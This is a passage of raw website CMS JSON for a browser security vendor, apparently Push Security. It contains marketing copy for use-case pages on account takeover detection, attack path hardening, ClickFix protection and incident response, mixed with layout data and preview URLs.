confidence.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F229f355be6f243b180f410d237a75bb3",{"large":530},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":406},{"@type":106,"@version":107,"id":532,"meta":533,"component":534,"responsiveStyles":536},"builder-1a689287d1a1418997d57db578a71105",{"previousId":408},{"name":354,"options":535,"isRSC":118},{"darkMode":6},{"large":537},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":539,"component":540,"responsiveStyles":542},"builder-feb4e75029f84c10b6498ef1f8f79128",{"name":416,"tag":416,"options":541,"isRSC":118},{"sectionHeading":37,"customClass":418},{"large":543},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":545,"@type":106,"tagName":131,"properties":546,"responsiveStyles":547},"builder-pixel-0edn39avfcei",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},{"large":548},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":550},{"path":37,"query":551},{},{},1776275365038,1757000441666,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F8d496cf111644ee5afcc046b72d1ca5a",[],{"kind":438,"winningTest":118,"breakpoints":558,"lastPreviewUrl":559,"hasLinks":6,"originalContentId":259,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},"https://pushsecurity.com/uc/browser-extension-security?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CcreateProjects%2CsendPullRequests&builder.user.role.name=Designer&builder.user.role.id=creator&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=54f8256648f54d439303734b1e69221b&builder.overrides.54f8256648f54d439303734b1e69221b=54f8256648f54d439303734b1e69221b&builder.overrides.use-case-page:/uc/browser-extension-security=54f8256648f54d439303734b1e69221b&builder.options.locale=Default",{"createdDate":561,"id":562,"name":563,"modelId":261,"published":13,"query":564,"data":567,"variations":670,"lastUpdated":671,"firstPublished":672,"testRatio":33,"screenshot":673,"createdBy":34,"lastUpdatedBy":674,"folders":675,"meta":676,"rev":440},1744923509705,"94bebb7bb99d48629ad157e80cf4d81d","Account takeover detection",[565],{"@type":264,"property":265,"operator":266,"value":566},"/uc/account-takeover-detection",{"title":563,"customFonts":568,"jsCode":37,"seoTitle":563,"seoDescription":573,"fontAwesomeIcon":574,"tsCode":37,"blocks":575,"url":566,"state":667},[569],{"kind":273,"category":295,"variants":570,"menu":296,"files":571,"family":272,"subsets":572,"version":274,"lastModified":275},[301,302,303,304,305,306,128,307,308,309,310,311,312,313,314,315,316,317],{"100":277,"200":278,"300":279,"500":280,"600":281,"700":282,"800":283,"900":284,"300italic":293,"500italic":292,"800italic":285,"700italic":287,"italic":289,"900italic":286,"600italic":294,"200italic":291,"regular":290,"100italic":288},[298,299],"Stop ATO with stolen credential and compromised token detection.","faUserSecret",[576,662],{"@type":106,"@version":107,"tagName":323,"id":577,"meta":578,"children":579},"builder-e7913a774cae44c5a23d6081c5c30a52",{"previousId":324},[580,596,603,610,619,629,639,649,656],{"@type":106,"@version":107,"id":581,"meta":582,"component":583,"responsiveStyles":594},"builder-f1f1ab1601bc4c0f8c2a8aafd173675d",{"previousId":328},{"name":327,"options":584,"isRSC":118},{"title":563,"description":585,"points":586,"video":593},"\u003Cp>Attackers don’t need to phish, they just need a password that works. Push monitors for signs of credential-based attacks in real time, directly in the browser, catching account takeover attempts before the damage spreads. From ghost logins to credential stuffing, Push cuts off the paths attackers use to quietly slip in the back door.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>",[587,589,591],{"item":588},"Identify credential-based ATO as it unfolds",{"item":590},"Surface hijacked sessions and token misuse",{"item":592},"Strengthen authentication where your IdP can’t","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb4dd9db24bc9495b8a686b1b4d492016%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=b4dd9db24bc9495b8a686b1b4d492016&alt=media&optimized=true",{"large":595},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":342},{"@type":106,"@version":107,"id":597,"meta":598,"component":599,"responsiveStyles":601},"builder-0bc0d1c78ece4994993c3a6427a4d533",{"previousId":344},{"name":346,"options":600,"isRSC":118},{"AllPartners":41,"backgroundTransparent":6},{"large":602},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":350},{"@type":106,"@version":107,"id":604,"meta":605,"component":606,"responsiveStyles":608},"builder-e45de8f3768c4f16938dbf78e4e87524",{"previousId":352},{"name":354,"options":607,"isRSC":118},{"darkMode":41},{"large":609},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":611,"component":612,"responsiveStyles":617},"builder-c98e8bfd341146c1b67c02d5698ff093",{"name":359,"tag":359,"options":613,"isRSC":118},{"darkMode":6,"maxWidth":363,"maxTextWidth":364,"title":614,"description":615,"image":616,"reverse":6},"\u003Ch2>Assume less. See more.\u003C/h2>","\u003Cp>Most account takeovers don’t start with a breach, they start with a login. Whether it’s a reused password, a local account, or an outdated login flow, Push shows you how accounts are actually accessed day to day, not just how policies say they should be. That means no more blind spots around ghost logins, bypassed SSO, or stale access paths that quietly persist.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F18630ad2746d4eb7b7fcc0428b11a8f0",{"large":618},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":620,"meta":621,"component":622,"responsiveStyles":627},"builder-55c1fc38ddc04fd1a0d6a8e2fb819e00",{"previousId":371},{"name":373,"options":623,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":376,"title":624,"description":625,"reverse":41,"image":626},"\u003Ch2>Catch stolen credential use in real time\u003C/h2>","\u003Cp>Push monitors login activity directly in the browser to detect signs of credential-based attacks like leaked password use or suspicious login flows. By analyzing attacker TTPs instead of relying on known indicators, Push spots credential stuffing and account takeover attempts the moment they begin, not after they’ve succeeded.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F52b0123cac2c4dfdb1dc0af6adf9d603",{"large":628},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":382,"paddingTop":384,"marginTop":384},{"@type":106,"@version":107,"id":630,"meta":631,"component":632,"responsiveStyles":637},"builder-dfb31737b30948c6b95323655d571a50",{"previousId":386},{"name":373,"options":633,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":389,"title":634,"description":635,"reverse":6,"image":636},"\u003Ch2>Detect session hijacks and stealth access\u003C/h2>","\u003Cp>Attackers don’t always need a login screen, they often sidestep it entirely using stolen session tokens. Push detects when valid sessions are reused in unexpected ways, identifying hijacked sessions and stealth access attempts that traditional tools miss. Because we monitor directly in the browser, you see what’s happening inside active sessions in real time.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F94a6859a99e04d309ffe5841f3dbdf5c",{"large":638},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":395},{"@type":106,"@version":107,"layerName":373,"id":640,"meta":641,"component":642,"responsiveStyles":647},"builder-f7585b90eb974d03a7dc7eae5b58d227",{"previousId":397},{"name":373,"options":643,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":400,"title":644,"description":645,"reverse":41,"image":646},"\u003Ch2>Harden accounts before they’re compromised\u003C/h2>","\u003Cp>Push goes beyond alerts. It identifies apps that still allow local logins, even when SSO is configured, so you can remove weak access paths. Push also flags users without MFA, reused work credentials, or weak passwords, and prompts users in-browser to fix risky behaviors before they’re exploited.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F01c1b638f1b6497093a4f2b8ceddb5bb",{"large":648},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":406},{"@type":106,"@version":107,"id":650,"meta":651,"component":652,"responsiveStyles":654},"builder-ad81d1e3afec49a791214194eae09bdc",{"previousId":408},{"name":354,"options":653,"isRSC":118},{"darkMode":6},{"large":655},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":657,"component":658,"responsiveStyles":660},"builder-8dac1aa4b9d148628d92252bd8eff822",{"name":416,"tag":416,"options":659,"isRSC":118},{"sectionHeading":37,"customClass":418},{"large":661},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":663,"@type":106,"tagName":131,"properties":664,"responsiveStyles":665},"builder-pixel-s5u3wmvz7jq",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},{"large":666},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":668},{"path":37,"query":669},{},{},1770892814499,1745499162732,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F58b660fa94aa4b30b0faeb9b663ae41a","SfUPqW5tkibIPby49keNFMdHFTr1",[],{"lastPreviewUrl":677,"hasLinks":6,"originalContentId":259,"breakpoints":678,"winningTest":118,"kind":438,"hasAutosaves":41},"https://pushsecurity.com/uc/account-takeover-detection?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=94bebb7bb99d48629ad157e80cf4d81d&builder.overrides.94bebb7bb99d48629ad157e80cf4d81d=94bebb7bb99d48629ad157e80cf4d81d&builder.overrides.use-case-page:/uc/account-takeover-detection=94bebb7bb99d48629ad157e80cf4d81d&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"xsmall":57,"small":39,"medium":40},{"createdDate":680,"id":681,"name":682,"modelId":261,"published":13,"query":683,"data":686,"variations":789,"lastUpdated":790,"firstPublished":791,"testRatio":33,"screenshot":792,"createdBy":34,"lastUpdatedBy":674,"folders":793,"meta":794,"rev":440},1745009370904,"23eb48fb56d3451cab77cb6ed140ee6d","Attack path hardening",[684],{"@type":264,"property":265,"operator":266,"value":685},"/uc/attack-path-hardening",{"tsCode":37,"seoDescription":687,"jsCode":37,"customFonts":688,"fontAwesomeIcon":693,"seoTitle":682,"title":682,"blocks":694,"url":685,"state":786},"Harden access paths with visibility,  detection, and guardrails.",[689],{"kind":273,"files":690,"version":274,"lastModified":275,"subsets":691,"menu":296,"category":295,"variants":692,"family":272},{"100":277,"200":278,"300":279,"500":280,"600":281,"700":282,"800":283,"900":284,"regular":290,"italic":289,"800italic":285,"500italic":292,"600italic":294,"200italic":291,"900italic":286,"700italic":287,"100italic":288,"300italic":293},[298,299],[301,302,303,304,305,306,128,307,308,309,310,311,312,313,314,315,316,317],"faRadar",[695,781],{"@type":106,"@version":107,"tagName":323,"id":696,"meta":697,"children":698},"builder-1d8553eddcaa44d7bba9e2f4ca13af2a",{"previousId":577},[699,715,722,729,738,748,758,768,775],{"@type":106,"@version":107,"id":700,"meta":701,"component":702,"responsiveStyles":713},"builder-84fe3d7c85a743cf8cef649aa974f1ef",{"previousId":581},{"name":327,"options":703,"isRSC":118},{"title":682,"description":704,"points":705,"video":712},"\u003Cp>Push continuously monitors your environment for exposed login paths, weak credentials, and missing protections like MFA. It detects the gaps attackers exploit and helps you close them before they’re used.\u003C/p>",[706,708,710],{"item":707},"Find weak spots like reused passwords, local logins, and missing MFA",{"item":709},"Monitor how users actually log in across apps, flows, and tools",{"item":711},"Enforce secure access with in-browser guardrails","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fdbdcf52892034f1bbddded77f753a343%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=dbdcf52892034f1bbddded77f753a343&alt=media&optimized=true",{"large":714},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":342},{"@type":106,"@version":107,"id":716,"meta":717,"component":718,"responsiveStyles":720},"builder-b3f66f5b08054cc78a06fecfc3ae2337",{"previousId":597},{"name":346,"options":719,"isRSC":118},{"AllPartners":41,"backgroundTransparent":6},{"large":721},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":350},{"@type":106,"@version":107,"id":723,"meta":724,"component":725,"responsiveStyles":727},"builder-4c73418b84be49ed85e6e13d2625c5a0",{"previousId":604},{"name":354,"options":726,"isRSC":118},{"darkMode":41},{"large":728},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":730,"component":731,"responsiveStyles":736},"builder-dec0246085e1485c803f7152b1922a81",{"name":359,"tag":359,"options":732,"isRSC":118},{"darkMode":6,"maxWidth":363,"maxTextWidth":364,"title":733,"description":734,"image":735,"reverse":6},"\u003Ch2>Find the gaps that lead to compromise\u003C/h2>","\u003Cp>Misconfigurations don’t show up in your config files, they show up in how users actually access apps. Push monitors real login behavior in the browser, surfacing risky patterns like local login access, duplicate accounts, or missing protections that leave doors wide open.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F309a59bba8d247a19476bb369397460e",{"large":737},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":739,"meta":740,"component":741,"responsiveStyles":746},"builder-ebf049a645604a249550996a88f8f3b6",{"previousId":620},{"name":373,"options":742,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":376,"title":743,"description":744,"reverse":41,"image":745},"\u003Ch2>See real login behavior\u003C/h2>","\u003Cp>Push watches authentication flows as they happen, giving you a live view of how users log in, which methods they choose, and where protections like MFA are missing. Plus, uncover every app and account in use, even shadow IT you didn’t know existed, without relying on stale config files or IdP assumptions. \u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb51f6b0357cc451b87a7a5016d984e5e",{"large":747},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":382,"paddingTop":383,"marginTop":384},{"@type":106,"@version":107,"id":749,"meta":750,"component":751,"responsiveStyles":756},"builder-431d175c59004669b0b2776b07d71737",{"previousId":630},{"name":373,"options":752,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":389,"title":753,"description":754,"reverse":6,"image":755},"\u003Ch2>Find and fix posture drift\u003C/h2>","\u003Cp>Security posture isn’t static. Push continuously monitors for issues like missing MFA or legacy login methods. When something falls out of policy, you know immediately with custom notifications so you can act before it turns into risk.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F324e39127dfc41e592b1183dfb39892d",{"large":757},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":395},{"@type":106,"@version":107,"layerName":373,"id":759,"meta":760,"component":761,"responsiveStyles":766},"builder-3dffdcbe0a484e2ca4c03f019b6d40ee",{"previousId":640},{"name":373,"options":762,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":400,"title":763,"description":764,"reverse":41,"image":765},"\u003Ch2>Guide users with in-browser guardrails\u003C/h2>","\u003Cp>Push doesn’t just surface problems, it helps you fix them. When users sign in without MFA, reuse a password, or use insecure credentials, Push prompts them directly in the browser to secure their access. It’s faster, more effective, and actually gets results.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fee8b75d13e45488aba55434a8b49ebb0",{"large":767},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":406},{"@type":106,"@version":107,"id":769,"meta":770,"component":771,"responsiveStyles":773},"builder-976bc222cd7647ff905f1e01cfedc453",{"previousId":650},{"name":354,"options":772,"isRSC":118},{"darkMode":6},{"large":774},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":776,"component":777,"responsiveStyles":779},"builder-8c47ec2fd0f74382bb3e6c870555632c",{"name":416,"tag":416,"options":778,"isRSC":118},{"sectionHeading":37,"customClass":418},{"large":780},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":782,"@type":106,"tagName":131,"properties":783,"responsiveStyles":784},"builder-pixel-7akm7dayau8",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},{"large":785},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":787},{"path":37,"query":788},{},{},1770892844854,1745499166112,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F6ca12bf728a045f1a31d40c0beb3bfe5",[],{"kind":438,"lastPreviewUrl":795,"breakpoints":796,"hasLinks":6,"originalContentId":562,"winningTest":118,"hasAutosaves":6},"https://pushsecurity.com/uc/attack-path-hardening?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=23eb48fb56d3451cab77cb6ed140ee6d&builder.overrides.23eb48fb56d3451cab77cb6ed140ee6d=23eb48fb56d3451cab77cb6ed140ee6d&builder.overrides.use-case-page:/uc/attack-path-hardening=23eb48fb56d3451cab77cb6ed140ee6d&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"xsmall":57,"small":39,"medium":40},{"createdDate":798,"id":799,"name":800,"modelId":261,"published":13,"query":801,"data":804,"variations":909,"lastUpdated":910,"firstPublished":911,"testRatio":33,"screenshot":912,"createdBy":34,"lastUpdatedBy":674,"folders":913,"meta":914,"rev":440},1761675020232,"ea4f309d2ffe46c5aa97ebf0fda4e2e3","ClickFix Protection",[802],{"@type":264,"property":265,"operator":266,"value":803},"/uc/clickfix-protection",{"seoDescription":805,"fontAwesomeIcon":806,"customFonts":807,"seoTitle":812,"jsCode":37,"tsCode":37,"title":812,"blocks":813,"url":803,"state":906},"Block attacks that trick users into running malicious code.","faLaptopCode",[808],{"files":809,"subsets":810,"menu":296,"version":274,"kind":273,"family":272,"lastModified":275,"variants":811,"category":295},{"100":277,"200":278,"300":279,"500":280,"600":281,"700":282,"800":283,"900":284,"200italic":291,"800italic":285,"700italic":287,"600italic":294,"100italic":288,"italic":289,"regular":290,"300italic":293,"500italic":292,"900italic":286},[298,299],[301,302,303,304,305,306,128,307,308,309,310,311,312,313,314,315,316,317],"ClickFix protection",[814,901],{"@type":106,"@version":107,"tagName":323,"id":815,"meta":816,"children":817},"builder-d7eefdde0f2a4b2b9de3dcb2978fd6cb",{"previousId":696},[818,834,841,848,858,868,878,888,895],{"@type":106,"@version":107,"id":819,"meta":820,"component":821,"responsiveStyles":832},"builder-56e2c54bcce040a4af8b92ae03706c12",{"previousId":700},{"name":327,"options":822,"isRSC":118},{"title":812,"description":823,"points":824,"image":831},"\u003Cp>ClickFix attacks are one of the fastest-growing threats, tricking users into copying malicious code from a webpage and running it locally. This technique bypasses traditional EDR, email gateways, and network filters, leading directly to ransomware and data theft. Push stops this attack at the source, in the browser, by detecting and blocking the malicious behavior before the user can ever paste the code.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>",[825,827,829],{"item":826},"Detect ClickFix, FileFix, and fake CAPTCHA in the browser",{"item":828},"Block malicious copy-and-paste actions before code is executed",{"item":830},"See full telemetry into which users were targeted and what they saw","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F7b74af62889847ebb3927364485b0546",{"large":833},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":342},{"@type":106,"@version":107,"id":835,"meta":836,"component":837,"responsiveStyles":839},"builder-05f9614d4e3e4dc88b3ee8658f54e10e",{"previousId":716},{"name":346,"options":838,"isRSC":118},{"AllPartners":41,"backgroundTransparent":6},{"large":840},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":350},{"@type":106,"@version":107,"id":842,"meta":843,"component":844,"responsiveStyles":846},"builder-c4fb5179366243c1b6c32d368675cf47",{"previousId":723},{"name":354,"options":845,"isRSC":118},{"darkMode":41},{"large":847},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":849,"meta":850,"component":851,"responsiveStyles":856},"builder-261af50705fd445d8cca4a6ba20d5391",{"previousId":730},{"name":359,"tag":359,"options":852,"isRSC":118},{"darkMode":6,"maxWidth":363,"maxTextWidth":364,"title":853,"description":854,"reverse":6,"image":855},"\u003Ch2>Stop ClickFix-style attacks before they become a breach\u003C/h2>","\u003Cp>Traditional security tools are blind to malicious copy and paste attacks because the attack exploits a gap between the browser and the endpoint. EDR only sees the payload after it runs, and network tools see only part of the picture.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F98b2f7e08dec4eafaf8e24937605b8cf",{"large":857},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":859,"meta":860,"component":861,"responsiveStyles":866},"builder-7d21b8aab8064c40b1e5dd23c4749309",{"previousId":739},{"name":373,"options":862,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":376,"title":863,"description":864,"reverse":41,"image":865},"\u003Ch2>Discover lures at the source\u003C/h2>","\u003Cp>Push inspects page behavior to identify ClickFix attacks as they happen. By inspecting the page, its structure, and how the user interacts with it, Push can detect and block these in-browser threats in real time. This deep, TTP-based inspection spots the trap even on novel pages that are built to bypass traditional web filters and blocklists.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F665bf47e01544c75bf9ddafd3917927b",{"large":867},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":382,"paddingTop":383,"marginTop":384},{"@type":106,"@version":107,"id":869,"meta":870,"component":871,"responsiveStyles":876},"builder-fb91943adf6149259ed9e1e6566c9afe",{"previousId":749},{"name":373,"options":872,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":389,"title":873,"description":874,"reverse":6,"image":875},"\u003Ch2>Block the malicious action\u003C/h2>","\u003Cp>When Push detects a malicious script, it intercepts the user's action and blocks the code from being copied to the clipboard. The user is protected, the attack is stopped, and no malicious code ever reaches the endpoint. Unlike broad DLP tools, this action is surgical, targeting only malicious behavior without disrupting normal work.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F5ee68f81f1ac416685cbfe91298cf827",{"large":877},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":395},{"@type":106,"@version":107,"layerName":373,"id":879,"meta":880,"component":881,"responsiveStyles":886},"builder-bfac95fada864e5a8259b955b5b5f98b",{"previousId":759},{"name":373,"options":882,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":400,"title":883,"description":884,"reverse":41,"image":885},"\u003Ch2>Accelerate ClickFix investigations\u003C/h2>","\u003Cp>When an attack happens, knowing what the user saw or did is critical. Push provides rich browser session data for rapid investigation and containment. Security teams get detailed telemetry on which users were targeted, what lure they were served, and when the block occurred. This enables defenders to reconstruct what happened and respond quickly, even when other tools miss the activity entirely.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F6cdf2a8aeddc4e9a9023cbf974e40239",{"large":887},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":406},{"@type":106,"@version":107,"id":889,"meta":890,"component":891,"responsiveStyles":893},"builder-136892e831684a6987f87d3be67c33d1",{"previousId":769},{"name":354,"options":892,"isRSC":118},{"darkMode":6},{"large":894},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":896,"component":897,"responsiveStyles":899},"builder-dec26b739f2f42beb5a73cfc6c675b60",{"name":416,"tag":416,"options":898,"isRSC":118},{"sectionHeading":37,"customClass":418},{"large":900},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":902,"@type":106,"tagName":131,"properties":903,"responsiveStyles":904},"builder-pixel-zzjpxxgrc2l",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},{"large":905},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":907},{"path":37,"query":908},{},{},1770892881888,1761847585203,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F375467b8bef34ed1a8a1cc5b8b67d75f",[],{"lastPreviewUrl":915,"originalContentId":681,"winningTest":118,"hasLinks":6,"kind":438,"breakpoints":916,"hasAutosaves":6},"https://pushsecurity.com/uc/clickfix-protection?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=ea4f309d2ffe46c5aa97ebf0fda4e2e3&builder.overrides.ea4f309d2ffe46c5aa97ebf0fda4e2e3=ea4f309d2ffe46c5aa97ebf0fda4e2e3&builder.overrides.use-case-page:/uc/clickfix-protection=ea4f309d2ffe46c5aa97ebf0fda4e2e3&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"xsmall":57,"small":39,"medium":40},{"createdDate":918,"id":919,"name":920,"modelId":261,"published":13,"query":921,"data":924,"variations":1029,"lastUpdated":1030,"firstPublished":1031,"testRatio":33,"screenshot":1032,"createdBy":34,"lastUpdatedBy":674,"folders":1033,"meta":1034,"rev":440},1745009743870,"a9d5556e77f84a37b5bd52310a7110c1","Incident response",[922],{"@type":264,"property":265,"operator":266,"value":923},"/uc/incident-response",{"seoDescription":925,"customFonts":926,"title":920,"jsCode":37,"fontAwesomeIcon":931,"seoTitle":932,"tsCode":37,"blocks":933,"url":923,"state":1026},"Investigate and respond faster with unique browser telemetry.",[927],{"kind":273,"subsets":928,"menu":296,"variants":929,"category":295,"family":272,"version":274,"lastModified":275,"files":930},[298,299],[301,302,303,304,305,306,128,307,308,309,310,311,312,313,314,315,316,317],{"100":277,"200":278,"300":279,"500":280,"600":281,"700":282,"800":283,"900":284,"900italic":286,"600italic":294,"200italic":291,"300italic":293,"100italic":288,"700italic":287,"800italic":285,"regular":290,"italic":289,"500italic":292},"faSatelliteDish","Browser based incident response",[934,1021],{"@type":106,"@version":107,"tagName":323,"id":935,"meta":936,"children":937},"builder-653c4aed737b4def88dc4cd2d695660a",{"previousId":696},[938,955,962,969,978,988,998,1008,1015],{"@type":106,"@version":107,"id":939,"meta":940,"component":941,"responsiveStyles":953},"builder-18190bd36518467d9154d27d7e945b9b",{"previousId":700},{"name":327,"options":942,"isRSC":118},{"title":943,"description":944,"points":945,"video":952},"Browser-based incident response","\u003Cp>Push gives you real-time visibility into what actually happened during a breach, right in the browser where the attack played out. From credential theft to session hijacking, Push captures high-fidelity telemetry so you can investigate quickly, contain confidently, and shut it down before it spreads.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>",[946,948,950],{"item":947},"Reconstruct what happened with real browser session context",{"item":949},"Investigate faster with real-world session context",{"item":951},"Trigger response actions automatically through your SIEM or 